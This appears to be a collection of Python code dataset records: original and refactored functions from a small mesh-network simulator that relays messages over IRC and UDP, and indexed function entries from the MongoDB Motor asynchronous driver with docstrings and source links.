    """runloop that reads incoming packets off the interface into the inq buffer"""
    self.log("ready to receive.")
    # short socket timeout instead of a blocking recv, so the connection can
    # be stopped mid-receive by flipping self.keep_listening
    self.net_socket.settimeout(0.05)
    while self.keep_listening:
        try:
            packet = self.net_socket.recv(4096)
        except Exception:
            # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are no longer swallowed; socket.timeout is an OSError and is
            # still treated as "nothing arrived this tick"
            packet = None
        if packet:
            packet, source = self._parse_msg(packet)
            if packet == "PING":
                # answer the server keepalive so we don't get disconnected
                self.net_socket.send(b'PONG ' + source + b'\r')
            elif packet:
                # fan the message out to every address listening on this link
                for mac_addr, recv_queue in self.inq.items():
                    recv_queue.put(packet)
    self.log('is down.')
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def _parse_msg(self, msg):\n if b\"PRIVMSG\" in msg:\n from_nick = msg.split(b\"PRIVMSG \",1)[0].split(b\"!\")[0][1:] # who sent the P... | class IRCLink(threading.Thread, VirtualLink):
"""This link connects to an IRC channel and uses it to simulate a BROADCAST connection over the internet.
Connect nodes on different computers to an IRCLink on the same channel and they will talk over the internet."""
def __init__(self, name='irc1', server='irc.freenode.net', port=6667, channel='##medusa', nick='bobbyTables'):
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.name = name
self.server = server
self.port = port
self.channel = channel
self.nick = nick if nick != 'bobbyTables' else 'bobbyTables' + str(randint(1, 1000))
self.log("starting...")
self._connect()
self._join_channel()
self.log("irc channel connected.")
def __repr__(self):
return "<"+self.name+">"
def stop(self):
self.net_socket.send(b"QUIT\r\n")
VirtualLink.stop(self)
def _parse_msg(self, msg):
if b"PRIVMSG" in msg:
from_nick = msg.split(b"PRIVMSG ",1)[0].split(b"!")[0][1:] # who sent the PRIVMSG
to_nick = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[0] # where did they send it
text = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[1].strip() # what did it contain
return (text, from_nick)
elif msg.find(b"PING :",0,6) != -1: # was it just a ping?
from_srv = msg.split(b"PING :")[1].strip() # the source of the PING
return ("PING", from_srv)
return ("","")
def _connect(self):
self.log("connecting to server %s:%s..." % (self.server, self.port))
self.net_socket = socket(AF_INET, SOCK_STREAM)
self.net_socket.connect((self.server, self.port))
self.net_socket.setblocking(1)
self.net_socket.settimeout(2)
msg = self.net_socket.recv(4096)
while msg:
try:
# keep reading 2 sec until servers stops sending text
msg = self.net_socket.recv(4096).strip()
except Exception:
msg = None
def _join_channel(self):
self.log("joining channel %s as %s..." % (self.channel, self.nick))
nick = self.nick
self.net_socket.settimeout(10)
self.net_socket.send(('NICK %s\r\n' % nick).encode('utf-8'))
self.net_socket.send(('USER %s %s %s :%s\r\n' % (nick, nick, nick, nick)).encode('utf-8'))
self.net_socket.send(('JOIN %s\r\n' % self.channel).encode('utf-8'))
msg = self.net_socket.recv(4096)
while msg:
if b"Nickname is already in use" in msg:
self.nick += str(randint(1, 1000))
self._join_channel()
return
elif b"JOIN" in msg:
# keep looping till we see JOIN, then we're succesfully in the room
break
try:
msg = self.net_socket.recv(4096).strip()
except:
msg = None
### Runloop
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
if not self.keep_listening:
self.log('is down.')
return
try:
# (because the IRC server sees this link as 1 connection no matter how many nodes use it, it wont send enough copies of the packet back)
# for each node listening to this link object locally
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put the packet directly in their in queue
# then send it down the wire to the IRC channel
self.net_socket.send(('PRIVMSG %s :%s\r\n' % (self.channel, packet.decode())).encode('utf-8'))
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False)
|
def send(self, packet, retry=True):
    """send a packet down the line to the interface"""
    if not self.keep_listening:
        self.log('is down.')
        return
    try:
        # The IRC server sees this link as a single connection no matter how
        # many local nodes share it, so it won't echo back enough copies --
        # deliver a copy to every local listener's queue ourselves...
        for recv_queue in self.inq.values():
            recv_queue.put(packet)
        # ...then push it down the wire to the IRC channel
        message = 'PRIVMSG %s :%s\r\n' % (self.channel, packet.decode())
        self.net_socket.send(message.encode('utf-8'))
    except Exception as e:
        self.log("Link failed to send packet over socket %s" % e)
        sleep(0.2)
        if retry:
            self.send(packet, retry=False)
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def send(self, packet, retry=True):\n \"\"\"send a packet down the line to the inteface\"\"\"\n if not self.keep_listening:\n self.log('is down.... | class IRCLink(threading.Thread, VirtualLink):
"""This link connects to an IRC channel and uses it to simulate a BROADCAST connection over the internet.
Connect nodes on different computers to an IRCLink on the same channel and they will talk over the internet."""
def __init__(self, name='irc1', server='irc.freenode.net', port=6667, channel='##medusa', nick='bobbyTables'):
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.name = name
self.server = server
self.port = port
self.channel = channel
self.nick = nick if nick != 'bobbyTables' else 'bobbyTables' + str(randint(1, 1000))
self.log("starting...")
self._connect()
self._join_channel()
self.log("irc channel connected.")
def __repr__(self):
return "<"+self.name+">"
def stop(self):
self.net_socket.send(b"QUIT\r\n")
VirtualLink.stop(self)
def _parse_msg(self, msg):
if b"PRIVMSG" in msg:
from_nick = msg.split(b"PRIVMSG ",1)[0].split(b"!")[0][1:] # who sent the PRIVMSG
to_nick = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[0] # where did they send it
text = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[1].strip() # what did it contain
return (text, from_nick)
elif msg.find(b"PING :",0,6) != -1: # was it just a ping?
from_srv = msg.split(b"PING :")[1].strip() # the source of the PING
return ("PING", from_srv)
return ("","")
def _connect(self):
self.log("connecting to server %s:%s..." % (self.server, self.port))
self.net_socket = socket(AF_INET, SOCK_STREAM)
self.net_socket.connect((self.server, self.port))
self.net_socket.setblocking(1)
self.net_socket.settimeout(2)
msg = self.net_socket.recv(4096)
while msg:
try:
# keep reading 2 sec until servers stops sending text
msg = self.net_socket.recv(4096).strip()
except Exception:
msg = None
def _join_channel(self):
self.log("joining channel %s as %s..." % (self.channel, self.nick))
nick = self.nick
self.net_socket.settimeout(10)
self.net_socket.send(('NICK %s\r\n' % nick).encode('utf-8'))
self.net_socket.send(('USER %s %s %s :%s\r\n' % (nick, nick, nick, nick)).encode('utf-8'))
self.net_socket.send(('JOIN %s\r\n' % self.channel).encode('utf-8'))
msg = self.net_socket.recv(4096)
while msg:
if b"Nickname is already in use" in msg:
self.nick += str(randint(1, 1000))
self._join_channel()
return
elif b"JOIN" in msg:
# keep looping till we see JOIN, then we're succesfully in the room
break
try:
msg = self.net_socket.recv(4096).strip()
except:
msg = None
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the connection mid-recv is possible
self.net_socket.settimeout(0.05)
while self.keep_listening:
try:
packet = self.net_socket.recv(4096)
except:
packet = None
if packet:
packet, source = self._parse_msg(packet)
if packet == "PING":
self.net_socket.send(b'PONG ' + source + b'\r')
elif packet:
for mac_addr, recv_queue in self.inq.items():
# put the packet in that mac_addr recv queue
recv_queue.put(packet)
self.log('is down.')
### IO
|
def hops(node1, node2):
    """returns # of hops it takes to get from node1 to node2, 1 means they're on the same link"""
    if node1 == node2:
        return 0
    shared_links = set(node1.interfaces) & set(node2.interfaces)
    if shared_links:
        # they share a common interface
        return 1
    # Not implemented yet: graph search to find min hops between distant nodes
    return 0
# MIT License : Nick Sweeting
import traceback
import time
import random
from mesh.node import Node
from mesh.links import UDPLink, VirtualLink, IRCLink
from mesh.programs import Printer, Switch
from mesh.filters import UniqueFilter
def linkmembers(nodes, link):
return [n for n in nodes if link in n.interfaces]
def eigenvalue(nodes, node=None):
"""
calculate the eigenvalue (number of connections) for a given node in an array of nodes connected by an array of links
if no node is given, return the minimum eigenvalue in the whole network
"""
if node is None:
return sorted([eigenvalue(nodes, n) for n in nodes])[0] # return lowest eigenvalue
else:
return len([1 for n in nodes if hops(node, n)])
def even_eigen_randomize(nodes, links, min_eigen=1):
print("Linking %s together randomly." % len(nodes))
for node in nodes:
while len(node.interfaces) < ((desired_min_eigenvalue - random.randint(0, 3)) or 1):
node.interfaces.append(random.choice(tuple(set(links) - set(node.interfaces))))
def ask(type, question, fallback=None):
value = input(question)
if type == bool:
if fallback:
return not value[:1].lower() == "n"
else:
return value[:1].lower() == "y"
try:
return type(value)
except Exception:
return fallback
HELP_STR = """Type a nodelabel or linkname to send messages.
e.g. [$]:n35
[n35]<en1> ∂5:hi
or
[$]:l5
<l5>(3) [n1,n4,n3]:whats up"""
if __name__ == "__main__":
# import sys
# import netifaces
# hardware_iface = netifaces.gateways()['default'][2][1]
port = 2016
# if len(sys.argv) > 1:
# hardware_iface = sys.argv[1]
num_nodes = ask(int, "How many nodes do you want? [30]:", 30)
num_links = ask(int, "How many links do you want? [8]:", 8)
irc_link = ask(bool, "Link to internet? y/[n]:", False)
real_link = ask(bool, "Link to local networks? [y]/n:", True)
randomize = ask(bool, "Randomize connections? [y]/n:", True)
print('Creating Links...')
links = []
if real_link:
links += [UDPLink('en0', port), UDPLink('en1', port+1), UDPLink('en2', port+2)]
if irc_link:
links += [IRCLink('irc0')]
links += [
VirtualLink("vl%s" % (x+1))
for x in range(num_links)
]
print('Creating Nodes...')
nodes = [
Node(None, "n%s" % x, Filters=[UniqueFilter], Program=random.choice((Printer, Switch)))
for x in range(num_nodes)
]
if randomize:
desired_min_eigenvalue = 4 if num_links > 4 else (len(links) - 2) # must be less than the total number of nodes!!!
even_eigen_randomize(nodes, links, desired_min_eigenvalue)
print("Let there be life.")
[link.start() for link in links]
for node in nodes:
node.start()
print("%s:%s" % (node, node.interfaces))
print(HELP_STR)
dont_exit = True
try:
while dont_exit:
command = str(input("[$]:"))
if command[:1] == "l":
# LINK COMMANDS
link = [l for l in links if l.name[1:] == command[1:]]
if link:
link = link[0]
link_members = linkmembers(nodes, link)
message = str(input("%s(%s) %s:" % (link, len(link_members), link_members)))
if message == "stop":
link.stop()
else:
link.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a link.")
elif command[:1] == "n":
# NODE COMMANDS
node = [n for n in nodes if n.name[1:] == command[1:]]
if node:
node = node[0]
message = str(input("%s<%s> ∂%s:" % (node, node.interfaces, eigenvalue(nodes, node))))
if message == "stop":
node.stop()
else:
node.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a node.")
elif command[:1] == "h":
print(HELP_STR)
else:
print("Invalid command.")
print(HELP_STR)
time.sleep(0.5)
except BaseException as e:
intentional = type(e) in (KeyboardInterrupt, EOFError)
if not intentional:
traceback.print_exc()
try:
assert all([n.stop() for n in nodes]), 'Some nodes failed to stop.'
assert all([l.stop() for l in links]), 'Some links failed to stop.'
except Exception as e:
traceback.print_exc()
intentional = False
print("EXITING CLEANLY" if intentional else "EXITING BADLY")
raise SystemExit(int(not intentional))
|
def eigenvalue(nodes, node=None):
    """
    calculate the eigenvalue (number of connections) for a given node in an array of nodes connected by an array of links
    if no node is given, return the minimum eigenvalue in the whole network
    """
    if node is not None:
        # count the nodes reachable from `node` in a nonzero number of hops
        return sum(1 for n in nodes if hops(node, n))
    # no node given: compute each node's eigenvalue and return the lowest one
    return sorted(eigenvalue(nodes, n) for n in nodes)[0]
# MIT License : Nick Sweeting
import traceback
import time
import random
from mesh.node import Node
from mesh.links import UDPLink, VirtualLink, IRCLink
from mesh.programs import Printer, Switch
from mesh.filters import UniqueFilter
def hops(node1, node2):
"""returns # of hops it takes to get from node1 to node2, 1 means they're on the same link"""
if node1 == node2:
return 0
elif set(node1.interfaces) & set(node2.interfaces):
# they share a common interface
return 1
else:
# Not implemented yet, graphsearch to find min hops between two nodes
return 0
def linkmembers(nodes, link):
return [n for n in nodes if link in n.interfaces]
def even_eigen_randomize(nodes, links, min_eigen=1):
print("Linking %s together randomly." % len(nodes))
for node in nodes:
while len(node.interfaces) < ((desired_min_eigenvalue - random.randint(0, 3)) or 1):
node.interfaces.append(random.choice(tuple(set(links) - set(node.interfaces))))
def ask(type, question, fallback=None):
value = input(question)
if type == bool:
if fallback:
return not value[:1].lower() == "n"
else:
return value[:1].lower() == "y"
try:
return type(value)
except Exception:
return fallback
HELP_STR = """Type a nodelabel or linkname to send messages.
e.g. [$]:n35
[n35]<en1> ∂5:hi
or
[$]:l5
<l5>(3) [n1,n4,n3]:whats up"""
if __name__ == "__main__":
# import sys
# import netifaces
# hardware_iface = netifaces.gateways()['default'][2][1]
port = 2016
# if len(sys.argv) > 1:
# hardware_iface = sys.argv[1]
num_nodes = ask(int, "How many nodes do you want? [30]:", 30)
num_links = ask(int, "How many links do you want? [8]:", 8)
irc_link = ask(bool, "Link to internet? y/[n]:", False)
real_link = ask(bool, "Link to local networks? [y]/n:", True)
randomize = ask(bool, "Randomize connections? [y]/n:", True)
print('Creating Links...')
links = []
if real_link:
links += [UDPLink('en0', port), UDPLink('en1', port+1), UDPLink('en2', port+2)]
if irc_link:
links += [IRCLink('irc0')]
links += [
VirtualLink("vl%s" % (x+1))
for x in range(num_links)
]
print('Creating Nodes...')
nodes = [
Node(None, "n%s" % x, Filters=[UniqueFilter], Program=random.choice((Printer, Switch)))
for x in range(num_nodes)
]
if randomize:
desired_min_eigenvalue = 4 if num_links > 4 else (len(links) - 2) # must be less than the total number of nodes!!!
even_eigen_randomize(nodes, links, desired_min_eigenvalue)
print("Let there be life.")
[link.start() for link in links]
for node in nodes:
node.start()
print("%s:%s" % (node, node.interfaces))
print(HELP_STR)
dont_exit = True
try:
while dont_exit:
command = str(input("[$]:"))
if command[:1] == "l":
# LINK COMMANDS
link = [l for l in links if l.name[1:] == command[1:]]
if link:
link = link[0]
link_members = linkmembers(nodes, link)
message = str(input("%s(%s) %s:" % (link, len(link_members), link_members)))
if message == "stop":
link.stop()
else:
link.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a link.")
elif command[:1] == "n":
# NODE COMMANDS
node = [n for n in nodes if n.name[1:] == command[1:]]
if node:
node = node[0]
message = str(input("%s<%s> ∂%s:" % (node, node.interfaces, eigenvalue(nodes, node))))
if message == "stop":
node.stop()
else:
node.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a node.")
elif command[:1] == "h":
print(HELP_STR)
else:
print("Invalid command.")
print(HELP_STR)
time.sleep(0.5)
except BaseException as e:
intentional = type(e) in (KeyboardInterrupt, EOFError)
if not intentional:
traceback.print_exc()
try:
assert all([n.stop() for n in nodes]), 'Some nodes failed to stop.'
assert all([l.stop() for l in links]), 'Some links failed to stop.'
except Exception as e:
traceback.print_exc()
intentional = False
print("EXITING CLEANLY" if intentional else "EXITING BADLY")
raise SystemExit(int(not intentional))
|
def chain_return_value(future, loop, return_value):
    """Compatible way to return a value in all Pythons.

    PEP 479, raise StopIteration(value) from a coroutine won't work forever,
    but "return value" doesn't work in Python 2. Instead, Motor methods that
    return values resolve a Future with it, and are implemented with callbacks
    rather than a coroutine internally.
    """
    chained = asyncio.Future(loop=loop)

    def copy(_future):
        # Propagate failure as-is; on success substitute the fixed return_value.
        exc = _future.exception()
        if exc is None:
            chained.set_result(return_value)
        else:
            chained.set_exception(exc)

    # Hop back onto the framework loop before touching `chained`.
    future._future.add_done_callback(functools.partial(loop.add_callback, copy))
    return chained
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""asyncio compatibility layer for Motor, an asynchronous MongoDB driver.
See "Frameworks" in the Developer Guide.
"""
import asyncio
import asyncio.tasks
import functools
import multiprocessing
import os
from asyncio import coroutine # For framework interface.
from concurrent.futures import ThreadPoolExecutor
CLASS_PREFIX = 'AsyncIO'
def get_event_loop():
return asyncio.get_event_loop()
def is_event_loop(loop):
return isinstance(loop, asyncio.AbstractEventLoop)
def check_event_loop(loop):
if not is_event_loop(loop):
raise TypeError(
"io_loop must be instance of asyncio-compatible event loop,"
"not %r" % loop)
def get_future(loop):
return asyncio.Future(loop=loop)
if 'MOTOR_MAX_WORKERS' in os.environ:
max_workers = int(os.environ['MOTOR_MAX_WORKERS'])
else:
max_workers = multiprocessing.cpu_count() * 5
_EXECUTOR = ThreadPoolExecutor(max_workers=max_workers)
def run_on_executor(loop, fn, *args, **kwargs):
# Adapted from asyncio's wrap_future and _chain_future. Ensure the wrapped
# future is resolved on the main thread when the executor's future is
# resolved on a worker thread. asyncio's wrap_future does the same, but
# throws an error if the loop is stopped. We want to avoid errors if a
# background task completes after the loop stops, e.g. ChangeStream.next()
# returns while the program is shutting down.
def _set_state():
if dest.cancelled():
return
if source.cancelled():
dest.cancel()
else:
exception = source.exception()
if exception is not None:
dest.set_exception(exception)
else:
result = source.result()
dest.set_result(result)
def _call_check_cancel(_):
if dest.cancelled():
source.cancel()
def _call_set_state(_):
if loop.is_closed():
return
loop.call_soon_threadsafe(_set_state)
source = _EXECUTOR.submit(functools.partial(fn, *args, **kwargs))
dest = asyncio.Future(loop=loop)
dest.add_done_callback(_call_check_cancel)
source.add_done_callback(_call_set_state)
return dest
# Adapted from tornado.gen.
def chain_future(a, b):
def copy(future):
assert future is a
if b.done():
return
if a.exception() is not None:
b.set_exception(a.exception())
else:
b.set_result(a.result())
a.add_done_callback(copy)
def is_future(f):
return isinstance(f, asyncio.Future)
def call_soon(loop, callback, *args, **kwargs):
if kwargs:
loop.call_soon(functools.partial(callback, *args, **kwargs))
else:
loop.call_soon(callback, *args)
def add_future(loop, future, callback, *args):
future.add_done_callback(
functools.partial(loop.call_soon_threadsafe, callback, *args))
def pymongo_class_wrapper(f, pymongo_class):
"""Executes the coroutine f and wraps its result in a Motor class.
See WrapAsync.
"""
@functools.wraps(f)
@asyncio.coroutine
def _wrapper(self, *args, **kwargs):
result = yield from f(self, *args, **kwargs)
# Don't call isinstance(), not checking subclasses.
if result.__class__ == pymongo_class:
# Delegate to the current object to wrap the result.
return self.wrap(result)
else:
return result
return _wrapper
def yieldable(future):
return next(iter(future))
def platform_info():
return None
|
mongodb/motor | motor/frameworks/tornado/__init__.py | pymongo_class_wrapper | python | def pymongo_class_wrapper(f, pymongo_class):
@functools.wraps(f)
@coroutine
def _wrapper(self, *args, **kwargs):
result = yield f(self, *args, **kwargs)
# Don't call isinstance(), not checking subclasses.
if result.__class__ == pymongo_class:
# Delegate to the current object to wrap the result.
raise gen.Return(self.wrap(result))
else:
raise gen.Return(result)
return _wrapper | Executes the coroutine f and wraps its result in a Motor class.
See WrapAsync. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/frameworks/tornado/__init__.py#L113-L130 | null | # Copyright 2014-2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
"""Tornado compatibility layer for Motor, an asynchronous MongoDB driver.
See "Frameworks" in the Developer Guide.
"""
import functools
import os
from concurrent.futures import ThreadPoolExecutor
import tornado.process
from tornado import concurrent, gen, ioloop, version as tornado_version
from tornado.gen import chain_future, coroutine # For framework interface.
CLASS_PREFIX = ''
def get_event_loop():
return ioloop.IOLoop.current()
def is_event_loop(loop):
return isinstance(loop, ioloop.IOLoop)
def check_event_loop(loop):
if not is_event_loop(loop):
raise TypeError(
"io_loop must be instance of IOLoop, not %r" % loop)
def get_future(loop):
return concurrent.Future()
if 'MOTOR_MAX_WORKERS' in os.environ:
max_workers = int(os.environ['MOTOR_MAX_WORKERS'])
else:
max_workers = tornado.process.cpu_count() * 5
_EXECUTOR = ThreadPoolExecutor(max_workers=max_workers)
def run_on_executor(loop, fn, *args, **kwargs):
# Need a Tornado Future for "await" expressions. exec_fut is resolved on a
# worker thread, loop.add_future ensures "future" is resolved on main.
future = concurrent.Future()
exec_fut = _EXECUTOR.submit(fn, *args, **kwargs)
def copy(_):
if future.done():
return
if exec_fut.exception() is not None:
future.set_exception(exec_fut.exception())
else:
future.set_result(exec_fut.result())
# Ensure copy runs on main thread.
loop.add_future(exec_fut, copy)
return future
def chain_return_value(future, loop, return_value):
"""Compatible way to return a value in all Pythons.
PEP 479, raise StopIteration(value) from a coroutine won't work forever,
but "return value" doesn't work in Python 2. Instead, Motor methods that
return values resolve a Future with it, and are implemented with callbacks
rather than a coroutine internally.
"""
chained = concurrent.Future()
def copy(_future):
if _future.exception() is not None:
chained.set_exception(_future.exception())
else:
chained.set_result(return_value)
future.add_done_callback(functools.partial(loop.add_callback, copy))
return chained
def is_future(f):
return isinstance(f, concurrent.Future)
def call_soon(loop, callback, *args, **kwargs):
if args or kwargs:
loop.add_callback(functools.partial(callback, *args, **kwargs))
else:
loop.add_callback(callback)
def add_future(loop, future, callback, *args):
loop.add_future(future, functools.partial(callback, *args))
def yieldable(future):
return future
def platform_info():
return 'Tornado %s' % (tornado_version,)
|
mongodb/motor | motor/core.py | AgnosticClient.watch | python | def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session) | Watch changes on this cluster.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on all databases in this cluster. Introduced in MongoDB 4.0.
See the documentation for :meth:`MotorCollection.watch` for more
details and examples.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
.. versionadded:: 2.0
.. mongodoc:: changeStreams | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L148-L200 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticClient(AgnosticBaseProperties):
__motor_class_name__ = 'MotorClient'
__delegate_class__ = pymongo.mongo_client.MongoClient
address = ReadOnlyProperty()
arbiters = ReadOnlyProperty()
close = DelegateMethod()
drop_database = AsyncCommand().unwrap('MotorDatabase')
event_listeners = ReadOnlyProperty()
fsync = AsyncCommand()
get_database = DelegateMethod(doc=get_database_doc).wrap(Database)
HOST = ReadOnlyProperty()
is_mongos = ReadOnlyProperty()
is_primary = ReadOnlyProperty()
list_databases = AsyncRead().wrap(CommandCursor)
list_database_names = AsyncRead()
local_threshold_ms = ReadOnlyProperty()
max_bson_size = ReadOnlyProperty()
max_idle_time_ms = ReadOnlyProperty()
max_message_size = ReadOnlyProperty()
max_pool_size = ReadOnlyProperty()
max_write_batch_size = ReadOnlyProperty()
min_pool_size = ReadOnlyProperty()
nodes = ReadOnlyProperty()
PORT = ReadOnlyProperty()
primary = ReadOnlyProperty()
read_concern = ReadOnlyProperty()
retry_writes = ReadOnlyProperty()
secondaries = ReadOnlyProperty()
server_info = AsyncRead()
server_selection_timeout = ReadOnlyProperty()
start_session = AsyncCommand(doc=start_session_doc).wrap(ClientSession)
unlock = AsyncCommand()
def __init__(self, *args, **kwargs):
"""Create a new connection to a single MongoDB instance at *host:port*.
Takes the same constructor arguments as
:class:`~pymongo.mongo_client.MongoClient`, as well as:
:Parameters:
- `io_loop` (optional): Special event loop
instance to use instead of default
"""
if 'io_loop' in kwargs:
io_loop = kwargs.pop('io_loop')
self._framework.check_event_loop(io_loop)
else:
io_loop = self._framework.get_event_loop()
kwargs.setdefault('connect', False)
kwargs.setdefault(
'driver',
DriverInfo('Motor', motor_version, self._framework.platform_info()))
delegate = self.__delegate_class__(*args, **kwargs)
super(AgnosticBaseProperties, self).__init__(delegate)
self.io_loop = io_loop
def get_io_loop(self):
return self.io_loop
def __getattr__(self, name):
if name.startswith('_'):
raise AttributeError(
"%s has no attribute %r. To access the %s"
" database, use client['%s']." % (
self.__class__.__name__, name, name, name))
return self[name]
def __getitem__(self, name):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
return db_class(self, name)
def wrap(self, obj):
if obj.__class__ == Database:
db_class = create_class_with_framework(
AgnosticDatabase,
self._framework,
self.__module__)
return db_class(self, obj.name, _delegate=obj)
elif obj.__class__ == CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ == ClientSession:
session_class = create_class_with_framework(
AgnosticClientSession,
self._framework,
self.__module__)
return session_class(obj, self)
|
mongodb/motor | motor/core.py | AgnosticClientSession.start_transaction | python | def start_transaction(self, read_concern=None, write_concern=None,
read_preference=None):
self.delegate.start_transaction(read_concern=read_concern,
write_concern=write_concern,
read_preference=read_preference)
return _MotorTransactionContext(self) | Start a multi-statement transaction.
Takes the same arguments as
:class:`~pymongo.client_session.TransactionOptions`.
Best used in a context manager block:
.. code-block:: python3
# Use "await" for start_session, but not for start_transaction.
async with await client.start_session() as s:
async with s.start_transaction():
await collection.delete_one({'x': 1}, session=s)
await collection.insert_one({'x': 2}, session=s) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L299-L320 | null | class AgnosticClientSession(AgnosticBase):
"""A session for ordering sequential operations.
Do not create an instance of :class:`MotorClientSession` directly; use
:meth:`MotorClient.start_session`:
.. code-block:: python3
collection = client.db.collection
async with await client.start_session() as s:
async with s.start_transaction():
await collection.delete_one({'x': 1}, session=s)
await collection.insert_one({'x': 2}, session=s)
.. versionadded:: 2.0
"""
__motor_class_name__ = 'MotorClientSession'
__delegate_class__ = ClientSession
commit_transaction = AsyncCommand()
abort_transaction = AsyncCommand()
end_session = AsyncCommand()
cluster_time = ReadOnlyProperty()
has_ended = ReadOnlyProperty()
options = ReadOnlyProperty()
operation_time = ReadOnlyProperty()
session_id = ReadOnlyProperty()
advance_cluster_time = DelegateMethod()
advance_operation_time = DelegateMethod()
def __init__(self, delegate, motor_client):
AgnosticBase.__init__(self, delegate=delegate)
self._client = motor_client
def get_io_loop(self):
return self._client.get_io_loop()
@property
def client(self):
"""The :class:`~MotorClient` this session was created from. """
return self._client
if PY35:
exec(textwrap.dedent("""
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.delegate.__exit__(exc_type, exc_val, exc_tb)
"""), globals(), locals())
def __enter__(self):
raise AttributeError("Use Motor sessions like 'async with await"
" client.start_session()', not 'with'")
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/core.py | AgnosticCollection.find | python | def find(self, *args, **kwargs):
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self) | Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L556-L571 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
